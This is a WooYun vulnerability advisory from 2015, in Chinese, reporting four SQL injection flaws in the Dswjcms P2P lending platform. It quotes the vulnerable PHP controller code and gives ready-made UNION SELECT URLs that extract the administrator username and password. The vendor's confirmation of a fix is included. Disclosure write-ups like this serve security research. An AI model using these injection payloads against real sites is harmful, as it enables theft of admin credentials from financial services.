当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141364

漏洞标题:Dswjcms p2p网贷系统前台4处sql注入

相关厂商:www.tifaweb.com

漏洞作者: 路人甲

提交时间:2015-10-07 09:15

修复时间:2016-01-11 15:36

公开时间:2016-01-11 15:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-07: 细节已通知厂商并且等待厂商处理中
2015-10-08: 厂商已经确认,细节仅向厂商公开
2015-10-11: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-02: 细节向核心白帽子及相关领域专家公开
2015-12-12: 细节向普通白帽子公开
2015-12-22: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

注入。官网demo

详细说明:

案例参照 http://wooyun.org/bugs/wooyun-2015-0141209/trace/3789f61a7765dbc4f4a4c7d1b04e6095。
-------------------------------------------------------------------------------------
#1
/Lib/Action/Win/IndexAction.class.php

public function loanAjax(){
		$Borrowing = D('Borrowing');
		import('ORG.Util.Page');// 导入分页类
		$type=$this->_param('type')==0?'':"type =".($this->_param('type')-1);	//借款类型
		$state=$this->_param('state')==1?'(state=1 or state=10)':"state =".($this->_param('state'));	//借款状态
		$classify=$this->_param('classify')==0?'':"way =".($this->_param('classify')-1);	//还款方式
		$scope=$this->_param('scope')==0?'':"candra =".($this->_param('scope')-1);	//借款期限
		if($type || $state || $classify || $scope){
			$type=$type?$type." and ":'';
			$state=$state?$state." and ":'';
			$scope=$scope?$scope." and ":'';
			$classify=$classify?$classify." and ":'';
			$where=$type.$state.$scope.$classify;
			
		}
		
		//$where.='(state=1 or state=10)';
		$where.='min>1';
		$count      = $Borrowing->where($where)->count();
.........


当存在 state type classify scope 时。且state不为1即可直接拼接sql。
exp:

Win/Index/loanAjax.html?type=1&state=0) UNION SELECT 1,2,3,(select concat(username,0x5c,password) from ds_admin limit 1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34%23&classify=1&scope=1


1.png


#2
/Lib/Action/Home/LoanAction.class.php

public function loanAjax(){
		$Borrowing = D('Borrowing');
		import('ORG.Util.Page');// 导入分页类
		$type=$this->_param('type')==0?'':"type =".($this->_param('type')-1);	//借款类型
		$state=$this->_param('state')==0?'(state=1 or state=10)':"state =".($this->_param('state'));	//借款状态
		$classify=$this->_param('classify')==0?'':"way =".($this->_param('classify')-1);	//还款方式
		$scope=$this->_param('scope')==0?'':"candra =".($this->_param('scope')-1);	//借款期限
		if($type || $state || $classify || $scope){
			$type=$type?$type." and ":'';
			$state=$state?$state." and ":'';
			$scope=$scope?$scope." and ":'';
			$classify=$classify?$classify." and ":'';
			$where=$type.$state.$scope.$classify;
			
		}
		
		//$where.='(state=1 or state=10)';
		$where.='min>1';
		$count      = $Borrowing->where($where)->count()


当存在 state type classify scope 时。且state不为0即可直接拼接sql。
exp:

Loan/loanAjax.html?type=1&state=1) UNION SELECT 1,2,3,(select concat(username,0x5c,password) from ds_admin limit 1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34%23&classify=1&scope=1


1.png


#3
D:/wamp/www/Lib/Action/Home/LoanAction.class.php

public function index(){
		$Borrowing = D('Borrowing');
		import('ORG.Util.Page');// 导入分页类
			$where='(state=1 or state=5 or state=7 or state=9)';
		if($this->_get('search')){
			$where.=" and `title` LIKE '%".$this->_get('search')."%'";
		}
		$count      = $Borrowing->where($where)->count();// 查询满足要求的总记录数
		$Page       = new Page($count,10);// 实例化分页类 传入总记录数和每页显示的记录数数
		$show       = $Page->show();// 分页显示输出
		$borrow=$this->borrow_unicoms($where,$Page->firstRow.','.$Page->listRows,'`stick` DESC,`time` DESC');
		$this->assign('borrow',$borrow);
		$this->assign('page',$show);// 赋值分页输出
		//标题、关键字、描述
		$Site = D("Site");
		$site=$Site->field('keyword,remark,title,link')->where('link="'.$_SERVER['REQUEST_URI'].'"')->find();
		$this->assign('si',$site);
		$active['loan']='active';
		$this->assign('active',$active);
		$endjs='
//AJAX分页


$this->_get('search') 接收search参数,然而tp这样接收参数只会对双引号编码,他是单引号包裹的。注入产生、

Loan.html?search=%27%29+UNION+SELECT+1%2C2%2C3%2C%28select+concat%28username%2C0x5c%2Cpassword%29+from+ds_admin+limit+1%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%23


1.png


#4
www/Lib/Action/Home/IndexAction.class.php

public function index(){
		$this->copyright();
		$where='state=1 or state=5 or state=7 or state=9';
		$borrow=$this->borrow_unicoms($where,'','`stick` DESC,`time` DESC');
		$this->assign('borrow',$borrow);
		//累计投资金额
		$borrowing = M('borrowing');
		$accumulate['sum']=$borrowing->where('`state`>1')->sum('money');
		//累计预期收益
		$money = M('money');
		$accumulate['benefit']=$money->sum('`stay_interest`+`make_interest`+`make_reward`');
		$this->assign('accumulate',$accumulate);
		//新闻中心
		$new=$this->someArticle(16,5);
		$this->assign('new',$new);
		$shuffling = M('shuffling');
		$shufflings=$shuffling->field('title,img,url')->order('`order` ASC')->select();
		$this->assign('shuff',$shufflings);
		$head="<link href='__PUBLIC__/css/jslides.css' rel='stylesheet'>";
		$this->assign('head',$head);
		//标题、关键字、描述
		$Site = D("Site");
		$site=$Site->field('keyword,remark,title,link')->where('link="'.$_SERVER['REQUEST_URI'].'"')->find();


$_SERVER['REQUEST_URI'] 直接获取的,那么直接就注入了- -

漏洞证明:

1.png


修复方案:

过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-08 08:27

厂商回复:

此类问题已经处理,已在官方论坛贴出修复办法,并在新版本中已测试无法执行,感谢楼主的宝贵意见

最新状态:

暂无